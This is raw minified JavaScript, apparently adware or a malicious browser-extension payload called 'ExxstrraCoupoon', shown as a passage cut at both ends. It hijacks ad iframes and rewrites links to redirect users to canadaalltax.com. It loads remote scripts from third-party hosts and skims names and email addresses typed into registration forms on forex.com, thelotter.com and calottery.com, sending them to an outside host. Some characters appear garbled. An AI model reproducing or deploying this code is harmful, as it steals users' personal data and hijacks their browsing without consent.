31364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1){return}}catch(e){};(function(){var stngs = {serverzy_domains:'ads.mangomediaads.com optimizedby.brealtime.com n66.adshostnet.com ad.z5x.net exchange.admailtiser.com ad.yieldmanager.com ad.adserverplus.com adservingstd.com servedby.adxplosions.com cdn.trkclk.net srv.aileronx.com servedby.adsplats.com ad.reachjunction.com ads.deliads.com srv1.statisticsreporting.com ads.ad-maven.com advs.adgorithms.com ad.adnetwork.net ads.incmd03.com ads.mediawhite.com Servedby.bigfineads.com ads.pubmatic.com ads.yahoo.com an.z5x.net ads.clovenetwork.com c5.zedo.com ib.adnxs.com ad.jumbaexchange.com tr.adsplats.com ads.sonobi.com fw.adsafeprotected.com ad.improvemedianetwork.com ads.networkhm.com media.glispa.com',attr_name:'s12403480529111048514',szy_domain:[\"centerfastjet.in\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12]],checkif:function(ifr){return (ifr.getAttribute('s12403480529111048514') || ifr.src.indexOf('=287609')>-1||ifr.src.indexOf('=458516')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};new function(){if(!document.getElementById(\"__zsc_once\")&&window.top===window.self){var n=document.createElement(\"div\");n.id=\"__zsc_once\";var p=document.getElementsByTagName(\"body\")[0];p&&p.appendChild(n);var d=this;d.version=\"0.0.2\";d.now=(new Date).getTime();d.prefix=\"jhjlijpomuhn\";d.setIframes=[];d.checkInterval=1E3;d.programCount=0;d.iframesFound=!1;d.programStarted=!1;d.watchStarted=!1;d.initProgramCounter=0;d.conf={nrnm:5,usedIframes:[],src:[],counter:0,jbs:{ifr:[],at:[]},imp:{pid:\"_zigTop\",eid:\"721\",hid:\"12403480529111048514\",lt:\"1.83\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"ty6hl_At\",rattr:stngs.attr_name,title:document.title,domain:[\"sitewebred.com\",\"gadgetproffi.com\"],sizes:stngs.ad_sizes}};d.conf.params={subid:d.conf.imp.pid,subid1:d.conf.imp.hid,subid2:d.conf.imp.eid,lt:d.conf.imp.lt};d.utils=new function(){var c=this;c.get_computed_style=\"function\"!=typeof window.getComputedStyle?\nfunction(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle?a.currentStyle:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.getDimensions=function(){var a=0,b=0;\"number\"==typeof window.innerWidth?(b=window.innerHeight,a=window.innerWidth):document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)?\n(b=document.documentElement.clientHeight,a=document.documentElement.clientWidth):document.body&&(document.body.clientWidth||document.body.clientHeight)&&(b=document.body.clientHeight,a=document.body.clientWidth);return[a,b]};c.replaceIframe=function(a,b){try{if(a&&\"IFRAME\"==a.nodeName){var c=a.cloneNode(!1);a.parentNode.replaceChild(c,a);c.src=b;return c}}catch(d){}};c.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};c.l=new function(){this.xlat=\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\";\nthis.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var b=\"\",c=0;c<a.length;){var d=this.xlat.indexOf(a.charAt(c++)),e=this.xlat.indexOf(a.charAt(c++)),h=this.xlat.indexOf(a.charAt(c++)),k=this.xlat.indexOf(a.charAt(c++)),m=(e&15)<<4|h>>2,l=(h&3)<<6|k,b=b+String.fromCharCode(d<<2|e>>4);64!=h&&0<m&&(b+=String.fromCharCode(m));64!=k&&0<l&&(b+=String.fromCharCode(l))}return this._utf8_decode(b)};this._utf8_decode=function(a){for(var b=\"\",c=0;c<a.length;){var d=a.charCodeAt©;\nif(128>d)b+=String.fromCharCode(d),c++;else if(191<d&&224>d)var e=a.charCodeAt(c+1),b=b+String.fromCharCode((d&31)<<6|e&63),c=c+2;else var e=a.charCodeAt(c+1),h=a.charCodeAt(c+2),b=b+String.fromCharCode((d&15)<<12|(e&63)<<6|h&63),c=c+3}return b}};c.cookie=new function(){var a=this;a.createCookie=function(a,c,d){if(d){var e=new Date;e.setTime(e.getTime()+864E5*d);d=\"; expires=\"+e.toGMTString()}else d=\"\";document.cookie=a+\"=\"+c+d+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),\nd=0;d<c.length;d++){for(var e=c[d];\" \"==e.charAt(0);)e=e.substring(1,e.length);if(0==e.indexOf(a))return e.substring(a.length,e.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};c.ajax={get:function(a,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&b(c.ajax.xhr.responseText)},this.xhr.send()}catch(d){}},post:function(a,b,d){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",a,!0);this.xhr.setRequestHeader(\"Content-type\",\n\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==c.ajax.xhr.readyState&&d(c.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};c.waitForTokens={};c.addScript=function(a){var b=document.createElement(\"script\");b.src=a;b.type=\"text/javascript\";b.id=d.prefix+\"_script\";try{(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(b)}catch©{}};c.waitForElement=function(a,b,g,f){var e=c.query_selector_all(a);clearTimeout(c.waitTimeout);\nif(25<d.waitForElementCounter)return b(null);if(\"undefined\"==typeof e||1>e.length){if(c.waitForTokens[f])return b(null);var h=arguments.callee;c.waitTimeout=setTimeout(function(){d.waitForElementCounter++;h(a,b,g,f)},g)}else{if(c.waitForTokens[f])return b(null);c.waitForTokens[f]=!0;d.waitForElementCounter=0;return b(e)}};c.flushWaitForTokens=function(){c.waitForTokens={}};c.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};c.get_computed_style=\"function\"!=typeof window.getComputedStyle?\nfunction(a){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=c.dhtml_prop_name(b);return\"object\"==typeof a.currentStyle&&null!=a.currentStyle&&\"undefined\"!=typeof a.currentStyle?a.currentStyle:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};c.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||\nvoid 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};c.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,c;for(c in a)b[c]=\narguments.callee(a[c]);return b}return a};c.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,c,d){return d.toUpperCase()})};c.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return new RegExp(a)};c.throttle=function(a,b){var c=null;return function(){var d=this,e=arguments;clearTimeout©;c=setTimeout(function(){a.apply(d,e)},b)}};c.epoch=function(){return(new Date).getTime()};c.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||\n[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();c.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};c.match_url=function(a,b){for(var d=0;d<b.length;d++)if(\"string\"==typeof b[d]){var f;f=/^\\/.+\\/$/.test(b[d])?new RegExp(b[d]):c.wildcard_to_regex(b[d]);if(f instanceof RegExp&&f.test(a))return!0}}};d.gatherIframes=function(){return document.getElementsByTagName(\"iframe\")};\nd.setPreparedIframesArr=function(){var c=document.getElementsByTagName(\"iframe\"),a=[];if(c.length){for(var b=0;b<c.length;b++){var d=c;stngs.checkif(d)||a.push(d)}return a}};d.url=new function(){var c=this;c.getIframesSizes=function(){for(var a=[],b=0;b<d.conf.jbs.ifr.length;b++)d.conf.jbs.ifr.getAttribute(\"replaced\")||a.push(d.conf.jbs.at);return a.join(\",\")};c.prepareKV=function(){var a=\"?tid=1&\",b;for(b in d.conf.params)a+=b+\"=\"+d.conf.params+\"&\";a+=\"k=\"+encodeURIComponent(c.getKeywords())+\n\"&\";return a+=\"size=\"+c.getIframesSizes()};c.getKeywords=function(){var a=d.conf.imp.title,b=document.getElementsByTagName(\"meta\");if(b)for(var c=0,f=b.length;c<f;c++)\"keywords\"!=b[c].name.toLowerCase()&&\"description\"!=b[c].name.toLowerCase()||(a+=\" \"+b[c].content.replace(/,/g,\" \"));if(c=document.getElementsByTagName(\"a\")){b={};for(f=0;f<c.length;f++)try{var e=c[f].innerText;\"undefined\"==typeof e&&(e=c[f].textContent);for(var h=e.toLowerCase().split(/[\\s,-]/g),k=0;k<h.length;k++)4>h[k].length||(b[h[k]]?\nb[h[k]]++:b[h[k]]=1)}catch(m){}var e=[],l;for(l in b)e.push([l,b[l]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(l=0;l<e.length;l++)a+=\" \"+e[l][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)};c.prepareUrl=function(){var a=\"//\"+d.conf.imp.domain[\"https:\"==window.self.location.protocol?1:0],b=c.prepareKV();return a+b}};d.handleIframe=new function(){var c=this;c.initHandleIframes=function(a){a=c.getIframeDimensions(a);return c.mapDimensionsSizeArr(a)};c.getIframeDimensions=function(a){var b;\ntry{b=parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/))?a.width:a.scrollWidth}catch©{}a=parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/))?a.height:a.scrollHeight;return[parseInt(b),parseInt(a)]};c.mapDimensionsSizeArr=function(a){var b=d.conf.imp.sizes,c=a[0];a=a[1];for(var f=0;f<b.length;f++)if(c>=b[f][0]-5&&c<=b[f][0]+5&&a>=b[f][1]-5&&a<=b[f][1]+5)return b[f][2];return!1};c.destruct=function(){c.conf.jbs={ifr:[],at:[]}}};\nd.protectIframes=new function(){var c=this;c.protectionTimer=c.now;c.checkForException=function(a){return a.nextSibling&&a.nextSibling.innerHTML?/<span.+>Ads( not)? by/.test(a.nextSibling.innerHTML):!1};c.scanForNewAdIframes=function(){var a=[],b=document.getElementsByTagName(\"iframe\");if(b){for(var c=0;c<b.length;c++){var f=b[c],e=parseInt(f.width),h=parseInt(f.height);e&&h||(h=d.utils.get_computed_style(f),e=parseInt(h.getPropertyValue(\"width\")),h=parseInt(h.getPropertyValue(\"height\")));if(e&&h&&\n!(110>e))for(var k=0;k<stngs.ad_sizes.length;k++){var m=stngs.ad_sizes[k];e!==m[0]||h!==m[1]||f.getAttribute(\"replaced\")||a.push(f)}}return a}};c.scanAndSetFrames=function(){clearTimeout(c.stimeout);if(0!==d.setIframes.length)for(var a=0;a<d.setIframes.length;a++){var b=d.setIframes[a][0],g=d.setIframes[a][1][0];if(g&&b.src!==g){if(c.checkForException(b))return;g.match(/^data/)?d.setIframes[a][0]=d.utils.replaceIframe(b,g):b.src=g}}a=c.scanForNewAdIframes();if(0<a.length)return d.preparedIframes=\na,d.conf.jbs.ifr=[],d.conf.jbs.at=[],d.prepareUrl(0,function(a){d.getAds(a,\"setFrames\")});c.stimeout=setTimeout(function(){d.watchStarted=!0;c.scanAndSetFrames()},d.checkInterval)};c.start=function(){c.scanAndSetFrames()}};d.getAds=function(c,a){d.utils.msie?(c=c+\"&cb=\"+d.prefix+\".\"+a,d.utils.addScript©) :D.utils.ajax.get(c,d[a])};d.restartProgram=function(){d.programCount++;40<d.programCount||d.watchStarted||setTimeout(d.initProgram,500)};d.prepareUrl=function(c,a){d.preparedIframes&&0!==d.preparedIframes.length||\nd.restartProgram();for(var b=0;b<d.preparedIframes.length;b++){var g=d.preparedIframes,f=d.handleIframe.initHandleIframes(g);f&&(g.setAttribute(d.conf.imp.rattr,\"true\"),d.conf.jbs.ifr.push(g),d.conf.jbs.at.push(f))}if(0===d.conf.jbs.ifr.length)return d.restartProgram();b=d.url.prepareUrl();a(b)};d.checkIfIframIsAd=function(c,a){for(var b=0;b<stngs.ad_sizes.length;b++){var d=stngs.ad_sizes;if(c>=d[0]-25&&c<=d[0]+25&&a>=d[1]-25&&a<=d[1]+25||100>c)return!0}return!1};d.checkIframeWidthHeight=function©{if(!c)return!1;\nfor(var a=0;a<c.length;a++){var b=c[a],d=parseInt(b.width);parseInt(b.height);for(b=0;b<stngs.ad_sizes.length;b++)if(d===stngs.ad_sizes[0])return!0}return!1};d.initProgram=function(){d.preparedIframes=d.setPreparedIframesArr();if(!d.preparedIframes)return d.restartProgram();d.programStarted=!0;d.prepareUrl(0,function©{0!==d.conf.jbs.ifr.length&&d.getAds(c,\"setFrames\")})};d.handleResponse=new function(){var c=this;c.iframeCounter=0;c.decodeResponse=function(a){try{var b=d.utils.l.decode(a);a=\n\"undefined\"!=typeof JSON&&JSON.parse?JSON.parse(b):eval(\"response = \"+b)}catch©{}return a};c.getAdUrl=function(a,b){return-1<a[0].indexOf(\"?\")?a[0]+\"&\"+d.conf.imp.jpshort+\"=\"+a[2]+\"_18x18_0\":\"\"};c.blockReferrer=function(a,b,g,f){g=c.getAdUrl(a,g);if(d.utils.msie){c.iframeCounter++;try{if(b&&\"IFRAME\"==b.nodeName){var e=b.cloneNode(!1);e.setAttribute(\"name\",\"adzy653rk\"+c.iframeCounter);e.setAttribute(\"frameboarder\",\"0\");b.parentNode.replaceChild(e,b);window.open(g,e.name);a[0]=g;return e}}catch(h){}}else try{e=\n'data:text/html;,<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body><iframe width=\"100%\" height=\"100%\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" src=\"'+g+'\"></iframe></body></html>',b.src=e,a[0]=e}catch(k){}};c.defaultReferer=function(a,b,d){b.src=c.getAdUrl(a,d)};c.setIframeSrc=function(a,b,g,f){switch(g){case 1:g=c.blockReferrer(b,a,g,f);\"undefined\"!==typeof g&&(a=g);break;default:c.defaultReferer(b,\na,g),b[0]=c.getAdUrl(b,g)}d.setIframes.push([a,b]);a.setAttribute(\"replaced\",\"true\")}};d.setFrames=function©{if((c=d.handleResponse.decodeResponse©)&&0<c.length)for(var a=0;a<c.length;a++){var b=c[a];b?d.handleResponse.setIframeSrc(d.conf.jbs.ifr[a],b,b[3],a):(b=d.conf.jbs.ifr[a],b.setAttribute(\"replaced\",\"true\"),d.setIframes.push([b,!1]))}d.protectIframes.start()};window.top==window.self&&d.initProgram();\"undefined\"==typeof window[d.prefix]&&(window[d.prefix]=d)}};\n})();(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax....48514&pid=0&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rTa8vTsEqS5FpdgKrTVXrjnEqdk6qjU6qa%3D%3D&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rTa8vTsEqS5FpdgKrTVXrjnEqdk6qjU6qa%3D%3D&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rTa8vTsEqS5FpdgKrTVXrjnEqdk6qjU6qa%3D%3D&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=rTa8vTsEqS5FpdgKrTVXrjnEqdk6qjU6qa%3D%3D&eid=721&hid=12403480529111048514&pid=0&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\.@]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"ty6hl_At=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"ty6hl_At=\")){var d=a.match(/ty6hl_At=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8dnihVWzmPhd96rTwMCyVUojaMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rjs9rdr9pda8rTUFrjwEqdY8rjn=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=rTa8vTsEqS5FpdgKrTVXrjnEqdk6qjU6qa%3D%3D&eid=721&hid=12403480529111048514&pid=0&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//www.superfish.com/ws/sf_main.jsp?dlsource=pcom&userId=3764379739762384840&CTID=p0&partnername=ExxstrraCoupoon\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1399/l.js?aoi=1311798366&pid=1399&zoneid=287609&ext=ExxstrraCoupoon&systemid=12403480529111048514&ext=ExxstrraCoupoon\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=721_0&hid=12403480529111048514&bname=ExxstrraCoupoon\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=721_0&hid=12403480529111048514&bname=ExxstrraCoupoon\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"ExxstrraCoupoon\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var 